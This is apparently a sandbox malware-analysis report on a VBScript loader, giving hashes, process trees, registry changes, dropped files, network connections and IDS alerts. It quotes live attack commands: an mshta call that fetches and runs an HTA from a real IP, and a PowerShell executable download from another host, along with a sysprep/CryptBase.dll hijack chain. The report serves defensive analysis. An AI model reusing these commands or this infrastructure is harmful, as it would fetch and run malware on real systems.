| File name: | common.vbs |
| Full analysis: | https://app.any.run/tasks/091c8d43-6786-4b29-a585-2a57b607953c |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | November 14, 2018, 11:32:37 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines |
| MD5: | 2BF3F6B5805BDF4B20D409BDC9F4F34A |
| SHA1: | 8EA2CB1492C3B8671A7E004C5F9EC80BB231FFCA |
| SHA256: | 771A8F83A0C6F08B2060D86FCBD40D36EE3A681BEADB32FF6F288E2648C64BF9 |
| SSDEEP: | 192:h7rezsm5/vygP8jggQhYXgLee22Gptn4NNf+frfbdPbZggAz5ahGE9NuuiMg1gMS:hWzs+/z8yiwLYfn4zyzD0N0T |
MALICIOUS
Downloads executable files from the Internet
- powershell.exe (PID: 3200)
Application was dropped or rewritten from another process
- UGjJgMwmRLHM.exe (PID: 1860)
- pyxduhotid.exe (PID: 3368)
- UGjJgMwmRLHM.exe (PID: 3596)
- rundll32.exe (PID: 2424)
- WUAUCTL.EXE (PID: 2320)
- WUAUCTL.EXE (PID: 3816)
Executes PowerShell scripts
- mshta.exe (PID: 1972)
Downloads executable files from IP
- powershell.exe (PID: 3200)
Loads dropped or rewritten executable
- rundll32.exe (PID: 2424)
- sysprep.exe (PID: 3920)
- SearchProtocolHost.exe (PID: 716)
- svchost.exe (PID: 852)
- WUAUCTL.EXE (PID: 2320)
- WUAUCTL.EXE (PID: 3816)
Runs PING.EXE for delay simulation
- cmd.exe (PID: 2020)
Starts NET.EXE for service management
- UGjJgMwmRLHM.exe (PID: 3596)
SUSPICIOUS
Starts MSHTA.EXE for opening HTA or HTMLS files
- WScript.exe (PID: 1388)
Creates files in the Windows directory
- powershell.exe (PID: 3200)
- wusa.exe (PID: 2552)
- sysprep.exe (PID: 3920)
- svchost.exe (PID: 852)
Executable content was dropped or overwritten
- powershell.exe (PID: 3200)
- UGjJgMwmRLHM.exe (PID: 1860)
- wusa.exe (PID: 2552)
- UGjJgMwmRLHM.exe (PID: 3596)
- svchost.exe (PID: 852)
Creates files in the user directory
- powershell.exe (PID: 3200)
Creates or modifies windows services
- svchost.exe (PID: 852)
Starts CMD.EXE for commands execution
- pyxduhotid.exe (PID: 3368)
- sysprep.exe (PID: 3920)
- UGjJgMwmRLHM.exe (PID: 3596)
Removes files from Windows directory
- wusa.exe (PID: 2552)
- svchost.exe (PID: 852)
- cmd.exe (PID: 2020)
Uses RUNDLL32.EXE to load library
- pyxduhotid.exe (PID: 3368)
Starts application with an unusual extension
- cmd.exe (PID: 1992)
Creates a software uninstall entry
- svchost.exe (PID: 852)
INFO
Reads internet explorer settings
- mshta.exe (PID: 1972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
65
Monitored processes
24
Malicious processes
10
Suspicious processes
3
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 716 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe14_ Global\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Exit code: 0 Version: 7.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 852 | C:\Windows\system32\svchost.exe -k netsvcs | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1388 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\common.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1812 | chcp 1252 | C:\Windows\system32\chcp.com | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Change CodePage Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1860 | "C:\windows\temp\UGjJgMwmRLHM.exe" | C:\windows\temp\UGjJgMwmRLHM.exe | powershell.exe | ||||||||||||
User: admin Company: msxvr Integrity Level: MEDIUM Description: mscache acclerate Exit code: 0 Version: 5, 3, 1, 0 Modules
| |||||||||||||||
| 1972 | mshta http://142.93.217.247/uecVE3zJeiTn.hta | C:\Windows\System32\mshta.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1992 | cmd /c C:\Users\admin\AppData\Local\TpTemp\lgt5ADB.tmp.cmd | C:\Windows\system32\cmd.exe | — | UGjJgMwmRLHM.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2020 | cmd /c C:\Users\admin\AppData\Local\Temp\lst152.tmp.bat | C:\Windows\system32\cmd.exe | — | sysprep.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2320 | "c:\users\public\odbc\odbc0\appmgmt.dll",GetResObjectType C:\Windows\TEMP\uAA23.tmp,80 | c:\users\public\odbc\WUAUCTL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2424 | rundll32.exe C:\Windows\system32\sysprep\CryptBase.dll ShowMsg | C:\Windows\system32\rundll32.exe | — | pyxduhotid.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
839
Read events
741
Write events
98
Delete events
0
Modification events
| (PID) Process: | (1972) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (1972) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (1972) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (1972) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
| (PID) Process: | (3200) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3200) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3200) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3200) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (3200) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (3200) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
Executable files
6
Suspicious files
10
Text files
7
Unknown types
11
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3200 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1DPPWYW9KOYGXICL2HYY.temp | — | |
MD5:— | SHA256:— | |||
| 1860 | UGjJgMwmRLHM.exe | C:\Users\admin\AppData\Local\Temp\jusFE31.tmp | — | |
MD5:— | SHA256:— | |||
| 3460 | extrac32.exe | C:\Users\admin\AppData\Local\tmp4246.tmp | — | |
MD5:— | SHA256:— | |||
| 2552 | wusa.exe | C:\Windows\system32\sysprep\$dpx$.tmp\eb99378eadbbb64486213bd01b4330d0.tmp | — | |
MD5:— | SHA256:— | |||
| 2552 | wusa.exe | C:\Windows\Logs\DPX\setuperr.log | — | |
MD5:— | SHA256:— | |||
| 3920 | sysprep.exe | C:\Users\admin\AppData\Local\Temp\lst152.tmp | — | |
MD5:— | SHA256:— | |||
| 3920 | sysprep.exe | C:\Windows\system32\sysprep\Panther\setuperr.log | — | |
MD5:— | SHA256:— | |||
| 3596 | UGjJgMwmRLHM.exe | C:\Users\admin\AppData\Local\Temp\jus5A5D.tmp | — | |
MD5:— | SHA256:— | |||
| 3192 | extrac32.exe | C:\Users\Public\ODBC\ODBC0\tmp40FB.tmp | — | |
MD5:— | SHA256:— | |||
| 3596 | UGjJgMwmRLHM.exe | C:\Users\admin\AppData\Local\TpTemp\lgt5ADB.tmp | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
0
Threats
10
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1972 | mshta.exe | GET | 200 | 142.93.217.247:80 | http://142.93.217.247/uecVE3zJeiTn.hta | CA | html | 602 b | malicious |
3200 | powershell.exe | GET | 200 | 174.138.121.3:80 | http://174.138.121.3/sFTkeOnpEUqW.exe | US | executable | 948 Kb | suspicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1972 | mshta.exe | 142.93.217.247:80 | — | — | CA | malicious |
3200 | powershell.exe | 174.138.121.3:80 | — | — | US | suspicious |
— | — | 122.10.89.172:4432 | — | Cloudie Limited | HK | malicious |
DNS requests
Threats
PID | Process | Class | Message |
|---|---|---|---|
1972 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTA application download |
1972 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
1972 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
1972 | mshta.exe | Attempted User Privilege Gain | ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199 |
1972 | mshta.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199) |
3200 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3200 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3200 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3200 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
1 ETPRO signatures available at the full report